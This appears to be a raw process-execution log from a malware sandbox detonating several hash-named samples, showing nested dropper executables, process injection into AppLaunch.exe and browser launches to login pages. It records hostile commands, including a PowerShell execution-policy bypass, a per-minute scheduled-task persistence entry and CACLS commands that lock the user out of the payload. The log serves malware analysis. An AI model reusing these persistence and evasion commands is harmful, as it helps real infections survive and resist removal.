"C:\Users\Admin\AppData\Local\Temp\MW-f55ff621-46e1-493b-b2bb-7e39b4be8933\files\windbg.exe"
\??\c:\tmpa\Autoit3.exe
c:\tmpa\Autoit3.exe c:\tmpa\script.au3
C:\Windows\SysWOW64\ICACLS.EXE
"C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-f55ff621-46e1-493b-b2bb-7e39b4be8933\." /SETINTEGRITYLEVEL (CI)(OI)LOW
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6456 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2960 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5380 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\26ba3fe65926140305a8fa605d09b8bd2fb8251648eac9b3165fb884a506e837\" -spe -an -ai#7zMap12133:190:7zEvent6168
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\26ba3fe65926140305a8fa605d09b8bd2fb8251648eac9b3165fb884a506e837\26ba3fe65926140305a8fa605d09b8bd2fb8251648eac9b3165fb884a506e837.docx" /o ""
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1904 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2460 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\2023-10-21\" -spe -an -ai#7zMap14145:82:7zEvent2925
C:\Users\Admin\Downloads\2023-10-21\3ff04a886155759f844f7bc5c71a1920f663f315d60d6ea8afeaf76de410315c.exe
"C:\Users\Admin\Downloads\2023-10-21\3ff04a886155759f844f7bc5c71a1920f663f315d60d6ea8afeaf76de410315c.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Admin\Downloads\2023-10-21\2e6f6602926ed48888a54e51672e75c77257767dfead4f0c3d8279bd04b89ba3.ps1'"
C:\Users\Admin\Downloads\2023-10-21\2b7ef6e04c3bf2603ed41f48ab872fa909f452eb96cac5e7dabc5ad6b92b9445.exe
"C:\Users\Admin\Downloads\2023-10-21\2b7ef6e04c3bf2603ed41f48ab872fa909f452eb96cac5e7dabc5ad6b92b9445.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\lt8vo92.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\lt8vo92.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SF6zA60.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SF6zA60.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Np2vg97.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Np2vg97.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Uc1gD21.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Uc1gD21.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WG15rR6.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WG15rR6.exe
C:\Users\Admin\Downloads\2023-10-21\1d9ae562e502248d16291201495a68309e2a2f8379994df23eecc750505cc811.exe
"C:\Users\Admin\Downloads\2023-10-21\1d9ae562e502248d16291201495a68309e2a2f8379994df23eecc750505cc811.exe"
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\cX2qj28.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\cX2qj28.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\rH1Hg13.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\rH1Hg13.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\cN9nQ50.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\cN9nQ50.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\Mk5aY05.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\Mk5aY05.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\1xc58Bp2.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\1xc58Bp2.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\2Yb8301.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\2Yb8301.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\3HD06ek.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\3HD06ek.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\4ib897wy.exe
C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\4ib897wy.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2QX1008.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2QX1008.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3ty63uc.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3ty63uc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ZS988iv.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ZS988iv.exe
C:\Users\Admin\Downloads\2023-10-21\065c379a33ef1539e8a68fd4b7638fe8a30ec19fc128642ed0c68539656374b9.exe
"C:\Users\Admin\Downloads\2023-10-21\065c379a33ef1539e8a68fd4b7638fe8a30ec19fc128642ed0c68539656374b9.exe"
C:\Users\Admin\Downloads\2023-10-21\58cbf150847528fa62ad3502e5016f444b6a6409d3202d94702dfbf4fcb761d9.exe
"C:\Users\Admin\Downloads\2023-10-21\58cbf150847528fa62ad3502e5016f444b6a6409d3202d94702dfbf4fcb761d9.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gF3mD54.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gF3mD54.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\oi9NR71.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\oi9NR71.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\ZF2zr63.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\ZF2zr63.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\Cb7yP98.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\Cb7yP98.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\1Nd23RF4.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\1Nd23RF4.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\5Bz2qb4.exe
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\5Bz2qb4.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\2pQ5650.exe
C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\2pQ5650.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\3Cf23Ki.exe
C:\Users\Admin\AppData\Local\Temp\IXP010.TMP\3Cf23Ki.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\6xw2GJ7.exe
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\6xw2GJ7.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E0B6.tmp\E0B7.tmp\E0B8.bat C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\6xw2GJ7.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5nc8bL3.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5nc8bL3.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\4em853cx.exe
C:\Users\Admin\AppData\Local\Temp\IXP009.TMP\4em853cx.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6EO2Xx5.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6EO2Xx5.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F1AD.tmp\F1AE.tmp\F1AF.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6EO2Xx5.exe"
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7092 /prefetch:1
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5860 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7408 /prefetch:1
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7716 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5424 -ip 5424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 1188
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\5nB9ui9.exe
C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\5nB9ui9.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\6BL1kL7.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\6BL1kL7.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\42CB.tmp\42DC.tmp\42DD.bat C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\6BL1kL7.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1984,7334218815962264574,7233991478505201463,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1344 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffd028446f8,0x7ffd02844708,0x7ffd02844718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
